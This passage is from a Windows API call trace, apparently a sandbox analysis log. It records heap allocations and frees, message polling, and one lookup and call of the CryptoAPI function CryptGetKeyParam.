(HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1b0 [0173.758] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28d8 [0173.758] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba138 [0173.758] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2898 [0173.758] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd960 [0173.758] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28e8 [0173.758] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd438 [0173.758] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2848 [0173.758] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0173.758] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28c8 [0173.758] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0173.758] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28c8 | out: hHeap=0x8a0000) returned 1 [0173.758] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0173.758] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0173.758] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0173.758] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0173.758] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28e8 [0173.758] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2848 [0173.759] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df118 | out: hHeap=0x8a0000) returned 1 [0173.759] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0173.759] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0173.759] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0173.759] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec40 | out: hHeap=0x8a0000) returned 1 [0173.759] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0173.759] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0173.759] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec40 [0173.759] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba288 [0173.759] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0173.759] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d440 [0173.759] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4a8 [0173.759] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd570 [0173.759] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2728 [0173.759] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd960 [0173.759] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28c8 [0173.759] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0173.759] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd438 [0173.759] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0173.759] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0173.759] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0173.759] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0173.759] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0173.759] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0173.760] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28c8 | out: hHeap=0x8a0000) returned 1 [0173.760] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0173.760] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0173.760] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4a8 | out: hHeap=0x8a0000) returned 1 [0173.760] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0173.760] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0173.760] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0173.760] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0173.760] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec40 | out: hHeap=0x8a0000) returned 1 [0173.760] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0173.760] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec40 [0173.760] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0173.760] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2728 [0173.760] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd438 [0173.760] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba288 [0173.760] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28c8 [0173.760] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0173.760] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df118 [0173.760] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba288 [0173.760] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0173.760] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2638 [0173.760] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0173.760] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0173.760] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0173.760] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2638 | out: hHeap=0x8a0000) returned 1 [0173.761] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd570 [0173.761] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db2e8 [0173.761] PeekMessageW (in: lpMsg=0x87e2d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e2d4) returned 0 [0173.761] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2638 [0173.761] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0173.761] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0173.761] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2638 | out: hHeap=0x8a0000) returned 1 [0173.761] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0173.761] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0173.761] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0173.761] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd570 [0173.761] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0173.761] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd960 [0173.761] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0173.761] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0173.761] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0173.761] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0173.761] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0173.761] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd510 [0173.761] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0173.761] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd360 [0173.761] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0173.761] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd918 [0173.761] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0173.762] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0173.762] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0173.762] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0173.762] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7b0 [0173.762] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0173.762] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0173.762] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0173.762] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0173.762] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3d8 [0173.762] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0173.762] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8d0 [0173.762] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0173.762] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db2e8 [0173.762] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df118 | out: hHeap=0x8a0000) returned 1 [0173.762] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0173.762] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0173.762] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df118 [0173.762] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba540 [0173.762] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2638 [0173.762] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d440 [0173.762] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4a8 [0173.762] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8b8 [0173.762] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2818 [0173.763] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba618 [0173.763] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2688 [0173.763] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2638 | out: hHeap=0x8a0000) returned 1 [0173.763] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4e0 [0173.763] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2638 [0173.763] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2638 | out: hHeap=0x8a0000) returned 1 [0173.763] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba618 | out: hHeap=0x8a0000) returned 1 [0173.763] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0173.763] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0173.763] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0173.763] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4a8 | out: hHeap=0x8a0000) returned 1 [0173.763] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0173.763] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0173.763] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0173.763] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df118 | out: hHeap=0x8a0000) returned 1 [0173.763] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0173.763] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4e0 [0173.763] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0173.763] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba540 [0173.763] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0173.763] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8b8 [0173.763] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0173.763] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df118 [0173.763] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba618 [0173.764] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0173.764] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d440 [0173.764] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4a8 [0173.764] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2e8 [0173.764] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2688 [0173.764] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd900 [0173.764] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2638 [0173.764] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0173.764] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba000 [0173.764] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0173.764] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0173.764] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd900 | out: hHeap=0x8a0000) returned 1 [0173.764] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2638 | out: hHeap=0x8a0000) returned 1 [0173.764] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0173.764] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0173.764] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4a8 | out: hHeap=0x8a0000) returned 1 [0173.764] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0173.764] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba618 | out: hHeap=0x8a0000) returned 1 [0173.764] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba000 | out: hHeap=0x8a0000) returned 1 [0173.764] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df118 | out: hHeap=0x8a0000) returned 1 [0173.764] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0173.764] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba000 [0173.764] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0173.765] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba618 [0173.765] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0173.765] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2e8 [0173.765] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0173.765] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0173.765] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2678 [0173.765] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd900 [0173.765] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0173.765] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0173.765] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2688 [0173.765] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0173.765] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0173.765] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0173.765] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2638 | out: hHeap=0x8a0000) returned 1 [0173.765] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0173.765] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0173.765] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0173.765] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0173.765] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0173.765] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0173.765] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0173.765] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0173.765] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0173.765] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0173.766] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0173.766] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0173.766] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0173.766] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0173.766] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0173.766] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0173.766] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0173.766] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0173.766] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0173.766] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2868 | out: hHeap=0x8a0000) returned 1 [0173.766] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0173.766] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x90d440, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptGetKeyParam", lpUsedDefaultChar=0x0) returned 17 [0173.766] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0173.766] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0173.766] GetProcAddress (hModule=0x74f20000, lpProcName="CryptGetKeyParam") returned 0x74f477cb [0173.766] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deba0 | out: hHeap=0x8a0000) returned 1 [0173.766] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2868 | out: hHeap=0x8a0000) returned 1 [0173.766] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2868 | out: hHeap=0x8a0000) returned 1 [0173.766] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0173.766] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2888 | out: hHeap=0x8a0000) returned 1 [0173.767] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0173.767] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0173.767] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deba0 | out: hHeap=0x8a0000) returned 1 [0173.767] CryptGetKeyParam (in: hKey=0x90aed8, dwParam=0x7, pbData=0x9c2848, pdwDataLen=0x87e2f0, dwFlags=0x0 | out: pbData=0x9c2848*=0x660e, pdwDataLen=0x87e2f0*=0x4) returned 1 [0173.767] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0173.767] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0173.767] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0173.767] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0173.767] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0173.767] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0173.767] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd798 | out: hHeap=0x8a0000) returned 1 [0173.767] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0173.767] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0173.767] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0173.767] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0173.767] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd798 | out: hHeap=0x8a0000) returned 1 [0173.767] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0c0 | out: hHeap=0x8a0000) returned 1 [0173.767] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0173.767] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0173.767] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0173.767] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0173.767] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0c0 | out: hHeap=0x8a0000) returned 1 [0173.767] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2638 | out: hHeap=0x8a0000) returned 1 [0173.767] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0173.767] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0173.767] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0173.768] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0173.768] HeapFree (in: 